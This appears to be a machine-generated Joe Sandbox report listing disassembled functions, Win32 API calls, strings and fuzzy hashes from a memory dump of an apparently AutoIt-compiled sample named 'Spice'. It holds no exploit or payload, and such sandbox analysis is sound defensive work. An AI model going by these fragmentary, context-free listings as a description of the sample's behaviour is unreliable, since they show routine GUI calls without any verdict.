                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF9192
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EF91AF
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00EF91FB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EF9211
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF9242
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EF9267
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EF92B0
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EF930F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EF9339
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EF9391
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00EF943E
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00EF9460
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF94AA
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF94D7
                                                                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 00EF94E6
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00EF950E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 3cdc0369cef1eb21c9ce6844d75b7a8759a111af92ba2d87776aff9232169ae6
                                                                                                                                                                                                                                      • Instruction ID: b83832f9e62ca61351670c86122dacb909a50bf4223b94df4ed8aa034f44d89a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cdc0369cef1eb21c9ce6844d75b7a8759a111af92ba2d87776aff9232169ae6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BE19B7090020DABDF219F94CC84FFE7BB9EB09714F109156FA55BA292DB718A81DF60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EF5007
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EF501C
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EF5023
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF5085
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00EF50B1
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EF50DA
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF50F8
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EF511E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00EF5133
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EF5146
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00EF5166
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EF5181
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EF5195
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EF51AD
                                                                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00EF51D3
                                                                                                                                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00EF51ED
                                                                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00EF5204
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00EF526F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                      • Opcode ID: 9f6d16e40dddfc761df554755e0fd782c2fcdb147c74d3b313d26daf15a50e58
                                                                                                                                                                                                                                      • Instruction ID: d58e442b0ab6939ed42584cc6caba36cd71f11712b3cba8d9af6724510bbb515
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f6d16e40dddfc761df554755e0fd782c2fcdb147c74d3b313d26daf15a50e58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7B17B72604744AFD704DF64D844B6ABBE5FF88314F009A1CF699AB2A1DB71EC05CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00ED499C
                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00ED49C2
                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00ED49F0
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ED49FB
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ED4A11
                                                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 00ED4A1C
                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00ED4A38
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ED4A81
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ED4A88
                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00ED4AB3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                      • API String ID: 699586101-1459072770
                                                                                                                                                                                                                                      • Opcode ID: dc4c902d2c735426ec1e97f44744f276b342b0ca99cd743d16c178b2f3c5b40d
                                                                                                                                                                                                                                      • Instruction ID: d877fd9a17229ec68d67d00e134bf8196b917892225b437385eb13bc811201c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc4c902d2c735426ec1e97f44744f276b342b0ca99cd743d16c178b2f3c5b40d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1741E572604215BBEF15B7709C46EBF77ACEF51710F00105AF908B62D2EB35DA02A6A6
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E72C8C
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00E72C94
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E72CBF
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00E72CC7
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00E72CEC
                                                                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E72D09
                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E72D19
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E72D4C
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E72D60
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00E72D7E
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00E72D9A
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E72DA5
                                                                                                                                                                                                                                        • Part of subcall function 00E72714: GetCursorPos.USER32(?), ref: 00E72727
                                                                                                                                                                                                                                        • Part of subcall function 00E72714: ScreenToClient.USER32(00F377B0,?), ref: 00E72744
                                                                                                                                                                                                                                        • Part of subcall function 00E72714: GetAsyncKeyState.USER32(00000001), ref: 00E72769
                                                                                                                                                                                                                                        • Part of subcall function 00E72714: GetAsyncKeyState.USER32(00000002), ref: 00E72777
                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00E713C7), ref: 00E72DCC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                      • Opcode ID: cdaa09f72f468fe95abec9e871abc159c614b696b61acc7f5d77ee7bc3d8ede1
                                                                                                                                                                                                                                      • Instruction ID: 757462eb8c3dff432dbcb7aae7bb1331052f18544bce00375541dfdc9d97ab85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdaa09f72f468fe95abec9e871abc159c614b696b61acc7f5d77ee7bc3d8ede1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86B17E7160020EAFDB14DFA8DC55BED7BB5FB08314F209229FA19A7290DB74A850DF54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00F00980,?,?,?,?,?), ref: 00E904E3
                                                                                                                                                                                                                                      • IsWindow.USER32(?), ref: 00EC66BB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Foreground_memmove
                                                                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                      • API String ID: 3828923867-1919597938
                                                                                                                                                                                                                                      • Opcode ID: 43ce9d6be942913fc2000f339b15576cfde947dcae516fc17ad0c003c19d90aa
                                                                                                                                                                                                                                      • Instruction ID: a0d17aaf966df9771e10bf7d9f5a052665426f6225cf9565ba8944e3adb1ca4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43ce9d6be942913fc2000f339b15576cfde947dcae516fc17ad0c003c19d90aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57D18270104202DFCB08EF20C541AABBBF5BF54348F506A1DF459776A2DB31E99ADB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00EF44AC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EF456C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                      • API String ID: 3974292440-719923060
                                                                                                                                                                                                                                      • Opcode ID: a11b72f057144a53b80a8513324d84b8221c6f6e23e35069d17656a49eb5d9f7
                                                                                                                                                                                                                                      • Instruction ID: 0129984ba30ff546eaa01f194e6e46db2ea839448ad44ab0c346dcdb07a3b2dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a11b72f057144a53b80a8513324d84b8221c6f6e23e35069d17656a49eb5d9f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DA18EB02042159FCB14FF20C851A7AB3E5AF85314F50A968F99ABB3D2DB30ED05CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00EE56E1
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00EE56EC
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00EE56F7
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00EE5702
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00EE570D
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00EE5718
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00EE5723
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00EE572E
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00EE5739
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00EE5744
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00EE574F
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00EE575A
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00EE5765
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00EE5770
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00EE577B
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00EE5786
                                                                                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 00EE5796
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 00EE57C1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                                                                                                      • Opcode ID: e6350017a19114623c1e1a85aee474831471f2756fbcb5906fa04f5d2ca56f33
                                                                                                                                                                                                                                      • Instruction ID: 6f9c490aba00eb3fd612376a194cfe576325aba16a5b8ba3d7688446e3b042d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6350017a19114623c1e1a85aee474831471f2756fbcb5906fa04f5d2ca56f33
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B415371E04319AADB109FBA8C49D6EFEF8EF51B14F10452FE549E7290DAB8A401CF51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ECB17B
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00ECB21C
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ECB22F
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ECB284
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ECB2C0
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00ECB2F7
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00ECB349
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00ECB37F
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00ECB39D
                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000), ref: 00ECB3A4
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ECB41E
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ECB432
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00ECB458
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ECB46C
                                                                                                                                                                                                                                        • Part of subcall function 00E9385C: _iswctype.LIBCMT ref: 00E93864
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                                                                                                                      • String ID: %s%u
                                                                                                                                                                                                                                      • API String ID: 3744389584-679674701
                                                                                                                                                                                                                                      • Opcode ID: da4e97ae4106738aa515ac83c2d97c5edea95670d9d0feaaaa76ff98189b0cc0
                                                                                                                                                                                                                                      • Instruction ID: 917cf34316eee1a8c17118d99ae81272e51fce0e41d491093c82e8ffb97cfbc3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da4e97ae4106738aa515ac83c2d97c5edea95670d9d0feaaaa76ff98189b0cc0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFA11371204216AFDB18DF64C986FEAB7E8FF04318F00551DF9A9E2191EB31E916CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00ECBAB1
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ECBAC2
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ECBAEA
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00ECBB07
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ECBB25
                                                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 00ECBB36
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ECBB6E
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ECBB7E
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ECBBA5
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ECBBEE
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ECBBFE
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00ECBC26
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 00ECBC8F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                                                                                                                                      • Opcode ID: 4f669d903f337541adf08f5c2b6a4a437a10416469551f283a4d3449a9fd9a09
                                                                                                                                                                                                                                      • Instruction ID: aad8a70810bae7e851a35507160612781bc1835a56fea170bad79288a29c87fa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f669d903f337541adf08f5c2b6a4a437a10416469551f283a4d3449a9fd9a09
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B481C2710043099BDB14DF14CA86FAABBE8FF44318F04A46DFD89AA096DB31DD46CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
